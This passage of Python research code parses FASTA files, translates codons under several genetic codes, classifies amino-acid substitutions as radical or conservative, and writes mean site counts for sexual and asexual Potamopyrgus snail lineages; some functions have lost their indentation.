Y","V"):"R",("H","R"):"C",("K
","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",(
"V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}}
resultsList = []
cri = 0
for scheme in aaSchemeList:
currScheme = aaSchemeDict[scheme]
currValue = currScheme[(aaList[0],aaList[1])]
if currValue == 'R':
cri += 1
resultsList.append(1)
else:
resultsList.append(0)
cri = cri/7.0
resultsList.append(cri)
return resultsList
def buildCodonDict(fasta, code='invertebrateMt'):
    """Split every sequence in a FASTA file into codons and translate it.

    Parameters:
        fasta: path to a FASTA file, parsed with buildSeqDict.
        code: name of the genetic code used for translation (default
            'invertebrateMt', which was hard-coded in the original).

    Returns:
        (seqDict, seqList, codonDict) where seqDict/seqList come straight
        from buildSeqDict and codonDict maps each sequence name to its
        list of codons.  Amino-acid translations are also computed
        (AADict) but, as in the original, are not part of the return
        value.
    """
    # NCBI translation table 1 (standard).  Every other code below is
    # expressed as its codon-level differences from this table, which
    # replaces fifteen near-identical 64-entry literals.
    standardCode = {
        'TTT': 'F', 'TTC': 'F', 'TTA': 'L', 'TTG': 'L',
        'TCT': 'S', 'TCC': 'S', 'TCA': 'S', 'TCG': 'S',
        'TAT': 'Y', 'TAC': 'Y', 'TAA': '*', 'TAG': '*',
        'TGT': 'C', 'TGC': 'C', 'TGA': '*', 'TGG': 'W',
        'CTT': 'L', 'CTC': 'L', 'CTA': 'L', 'CTG': 'L',
        'CCT': 'P', 'CCC': 'P', 'CCA': 'P', 'CCG': 'P',
        'CAT': 'H', 'CAC': 'H', 'CAA': 'Q', 'CAG': 'Q',
        'CGT': 'R', 'CGC': 'R', 'CGA': 'R', 'CGG': 'R',
        'ATT': 'I', 'ATC': 'I', 'ATA': 'I', 'ATG': 'M',
        'ACT': 'T', 'ACC': 'T', 'ACA': 'T', 'ACG': 'T',
        'AAT': 'N', 'AAC': 'N', 'AAA': 'K', 'AAG': 'K',
        'AGT': 'S', 'AGC': 'S', 'AGA': 'R', 'AGG': 'R',
        'GTT': 'V', 'GTC': 'V', 'GTA': 'V', 'GTG': 'V',
        'GCT': 'A', 'GCC': 'A', 'GCA': 'A', 'GCG': 'A',
        'GAT': 'D', 'GAC': 'D', 'GAA': 'E', 'GAG': 'E',
        'GGT': 'G', 'GGC': 'G', 'GGA': 'G', 'GGG': 'G',
    }

    def _variant(changes):
        # Copy the standard table and overlay the code-specific codons.
        table = dict(standardCode)
        table.update(changes)
        return table

    geneticCodes = {
        'standard': standardCode,
        'invertebrateMt': _variant({'ATA': 'M', 'AGA': 'S', 'AGG': 'S', 'TGA': 'W'}),
        'vertebrateMt': _variant({'ATA': 'M', 'AGA': '*', 'AGG': '*', 'TGA': 'W'}),
        'yeastMt': _variant({'CTT': 'T', 'CTC': 'T', 'CTA': 'T', 'CTG': 'T',
                             'ATA': 'M', 'TGA': 'W'}),
        'coelenterateMt': _variant({'TGA': 'W'}),
        'ciliateNuc': _variant({'TAA': 'Q', 'TAG': 'Q'}),
        'echinodermMt': _variant({'AAA': 'N', 'AGA': 'S', 'AGG': 'S', 'TGA': 'W'}),
        'euplotidNuc': _variant({'TGA': 'C'}),
        'bacterial': _variant({}),  # identical to the standard code in the original
        'yeastNuc': _variant({'CTG': 'S'}),
        'ascidianMt': _variant({'ATA': 'M', 'AGA': 'G', 'AGG': 'G', 'TGA': 'W'}),
        'flatwormMt': _variant({'AAA': 'N', 'AGA': 'S', 'AGG': 'S',
                                'TAA': 'Y', 'TGA': 'W'}),
        'chlorophyceanMt': _variant({'TAG': 'L'}),
        'trematodeMt': _variant({'AAA': 'N', 'AGA': 'S', 'AGG': 'S',
                                 'ATA': 'M', 'TGA': 'W'}),
        'pterobranchiaMt': _variant({'AGA': 'S', 'AGG': 'K', 'TGA': 'W'}),
    }
    geneticCode = geneticCodes[code]
    startCodons = ['ATT', 'ATC', 'ATA', 'ATG', 'GTG']
    seqDict, seqList = buildSeqDict(fasta)
    codonDict = {}
    AADict = {}
    for seq in seqList:
        nucleotideSeq = seqDict[seq]
        # Consecutive non-overlapping triplets; a trailing partial codon
        # (fewer than 3 bases) is dropped, exactly as the original
        # index-walking loop did.
        codonList = [nucleotideSeq[i:i + 3]
                     for i in range(0, len(nucleotideSeq) - 2, 3)]
        codonDict[seq] = codonList
        AAseq = ''
        for codonNum, codon in enumerate(codonList, start=1):
            if 'N' in codon or '-' in codon:
                aa = 'X'  # ambiguous base or alignment gap in this codon
            elif codonNum == 1 and codon in startCodons:
                aa = 'M'  # alternative start codons are read as Met
            else:
                aa = geneticCode[codon]
            AAseq += aa
        # Trim a trailing stop.  endswith also guards the empty-sequence
        # case where the original's AAseq[-1] raised IndexError.
        if AAseq.endswith('*'):
            AAseq = AAseq[:-1]
        AADict[seq] = AAseq
    return seqDict, seqList, codonDict
def buildSeqDict(fasta):
    """Parse a FASTA file.

    Parameters:
        fasta: path to the FASTA file to read.

    Returns:
        (scaffoldDict, scaffoldList): scaffoldDict maps each header line
        (kept verbatim, including the leading '>') to its concatenated
        sequence; scaffoldList holds the headers in file order.
    """
    scaffoldDict = {}
    scaffoldList = []
    seqName = ''
    currSeq = ''
    # 'with' guarantees the handle is closed; the original opened the
    # file and never closed it.
    with open(fasta, 'r') as infile:
        for line in infile:
            if line[0] == '>':
                if seqName != '':
                    # Flush the previous record before starting a new one.
                    scaffoldDict[seqName] = currSeq
                # rstrip removes any run of trailing newline/tab/CR
                # characters, equivalent to the original's while loop.
                seqName = line.rstrip('\n\t\r')
                scaffoldList.append(seqName)
                currSeq = ''
            else:
                # Stripping the line (not the accumulated sequence) also
                # fixes the original's IndexError on a blank line that
                # appears before any sequence data.
                currSeq += line.rstrip('\n\t\r')
    # Flush the final record (or '' -> '' for an empty file, as before).
    scaffoldDict[seqName] = currSeq
    return scaffoldDict, scaffoldList
def _siteRow(totals, divisor):
    """Scale a 16-element site-count vector and order it for output.

    totals holds S, N, then seven index pairs (2k, 2k+1) for k = 1..7,
    one pair per amino-acid classification scheme.  The output columns
    are (C_k, R_k) with C_k taken from index 2k+1 and R_k from index 2k,
    which reproduces the original scalar-variable mapping
    (e.g. C1 += snailSites[3], R1 += snailSites[2]).  The seven-scheme
    means meanC and meanR are appended last.
    """
    row = [totals[0] / divisor, totals[1] / divisor]
    for k in range(1, 8):
        row.append(totals[2 * k + 1] / divisor)  # C_k column
        row.append(totals[2 * k] / divisor)      # R_k column
    # Means are computed from the already-divided per-scheme values,
    # in the same left-to-right order as the original sums.
    meanC = (row[2] + row[4] + row[6] + row[8] + row[10] + row[12] + row[14]) / 7
    meanR = (row[3] + row[5] + row[7] + row[9] + row[11] + row[13] + row[15]) / 7
    return row + [meanC, meanR]


def meanSites(fasta):
    """Write per-group mean site counts to 'sites.txt' (in the CWD).

    Runs countSites on every P. antipodarum lineage in *fasta* plus the
    P. estuarinus outgroup, then writes one row of means for each of:
    the antipodarum/estuarinus divergence pool, all P. antipodarum,
    sexual lineages, and asexual lineages.  Replaces ~250 lines of
    copy-pasted scalar accumulation with 16-element vectors; output is
    value-for-value identical to the original.
    """
    # FASTA headers of the asexual lineages, verbatim.
    asexList = ['>$Duluth', '>$Heron2', '>$McGregor', '>$Waik36', '>$WalesC',
                '>$clone_1', '>$AC51', '>$Heron_mitochondrion', '>$clone_7',
                '>$Waik37', '>$Gunn', '>$DenmarkA', '>$Waik372', '>$Tarawera',
                '>$Poerua_triploid', '>$Kaniere_triploid',
                '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237',
                '>$Brunner_2_4n', '>$Brunner_6_3n', '>$Grasmere_1_4n',
                '>$Grasmere_6_3n', '>$Poerua_72_4n', '>$Rotoiti_1_4n']
    # FASTA headers of the sexual lineages, verbatim.
    sexList = ['>$*Kaniere_1_2n',
               '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309',
               '>$*Yellow_Contig_56', '>$*Alexsex', '>$*AlexMap', '>$*Lady',
               '>$*Ianthe', '>$*Rotoroa_1_2n']
    # The original listed this union explicitly; it is exactly asex + sex,
    # element for element and in the same order.
    antipodarumList = asexList + sexList
    seqDict, seqList, codonDict = buildCodonDict(fasta)

    nSites = 16  # S, N, and seven (site-class) index pairs from countSites
    totalAll = [0] * nSites
    totalSex = [0] * nSites
    totalAsex = [0] * nSites
    for snail in antipodarumList:
        snailSites = countSites(codonDict[snail])
        for i in range(nSites):
            totalAll[i] += snailSites[i]
        if snail in sexList:
            group = totalSex
        elif snail in asexList:
            group = totalAsex
        else:
            continue  # unreachable: every snail is in exactly one group
        for i in range(nSites):
            group[i] += snailSites[i]

    est = countSites(codonDict['>Potamopyrgus_estuarinus'])
    # NOTE(review): the original read est[2], est[3], ... as (C, R) pairs
    # (estC1 = est[2], estR1 = est[3]) but accumulated snailSites[2],
    # snailSites[3], ... as (R, C) pairs (R1 += snailSites[2],
    # C1 += snailSites[3]).  The divergence row therefore adds each
    # group "R" total to the outgroup "C" value and vice versa.  That
    # cross-pairing is preserved verbatim below — verify against
    # countSites' actual return order whether it is intentional.
    combined = [totalAll[0] + est[0], totalAll[1] + est[1]]
    for k in range(1, 8):
        combined.append(totalAll[2 * k] + est[2 * k + 1])
        combined.append(totalAll[2 * k + 1] + est[2 * k])

    rows = [
        ('P.antipodarum-P.estuarinus',
         _siteRow(combined, len(antipodarumList) + 1)),
        ('P.antipodarum', _siteRow(totalAll, len(antipodarumList))),
        ('Sex', _siteRow(totalSex, len(sexList))),
        ('Asex', _siteRow(totalAsex, len(asexList))),
    ]
    # 'with' replaces the bare open/close so the file is closed even if
    # a write fails; column layout matches the original exactly.
    with open('sites.txt', 'w') as outfile:
        outfile.write('Group\tS\tN\tC1\tR1\tC2\tR2\tC3\tR3\tC4\tR4\tC5\tR5'
                      '\tC6\tR6\tC7\tR7\tmeanC\tmeanR\n')
        for label, values in rows:
            outfile.write(label + '\t' +
                          '\t'.join(str(v) for v in values) + '\n')
def countSites(codonList):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 
'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 
'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 
'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 
'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 